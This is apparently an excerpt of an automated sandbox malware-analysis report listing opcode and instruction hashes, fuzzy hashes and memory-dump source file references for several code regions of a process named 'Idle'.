                                                                                              • API String ID:
                                                                                              • Opcode ID: 0912bdab1e43f4413a90b70e5b8c39200c13237a2eef805531595383630852f9
                                                                                              • Instruction ID: aa3be45432c424def263fcc3b3323031a12f82204e32b1d6c275b1d2a18d077e
                                                                                              • Opcode Fuzzy Hash: 0912bdab1e43f4413a90b70e5b8c39200c13237a2eef805531595383630852f9
                                                                                              • Instruction Fuzzy Hash: 4F111531E0522D8EEB38DF95C8107FDB3B0EF55301F4111BAD04DA6292DAB86A84DF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b43a86111bde45692d3f3edc44e58c66cbf52d3c9ce4dad5b0b5d225f4fc4b6
                                                                                              • Instruction ID: 949bee5810b7208830796af4db1ddefffa681c914e4969c46504a918cbcbedf1
                                                                                              • Opcode Fuzzy Hash: 6b43a86111bde45692d3f3edc44e58c66cbf52d3c9ce4dad5b0b5d225f4fc4b6
                                                                                              • Instruction Fuzzy Hash: DC11A4B0A0962D8FDBA9DF58D890BACB7B4FB18300F1045E9E40EE3250DB706B809F40
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f0702ce146b00fa93329e657cbd8d3f91f598b9470fd81630b19fab946bd1a1f
                                                                                              • Instruction ID: 31e56e789d38c72d5dc2261651f7b7ce87970634a39a0777f84993c72a8018be
                                                                                              • Opcode Fuzzy Hash: f0702ce146b00fa93329e657cbd8d3f91f598b9470fd81630b19fab946bd1a1f
                                                                                              • Instruction Fuzzy Hash: BC011270E5F51D8AD774DB9584243FCF6F6EF4A301F111079C00EA25A2CE786B449A21
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 049d541c46ddef1fb37d4fc18a3894bf42c4fa5fcaed8b26367e435fa7ccd5fc
                                                                                              • Instruction ID: 17a446d662b1f8926edc96312a61379e162cd29bd5a7ca4ccdf1ee16c6903984
                                                                                              • Opcode Fuzzy Hash: 049d541c46ddef1fb37d4fc18a3894bf42c4fa5fcaed8b26367e435fa7ccd5fc
                                                                                              • Instruction Fuzzy Hash: 03F0F932A1EA4E4EFBBC9F68483A1B97AD1BF56700F05017DE85CC21A2DDB565148A41
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false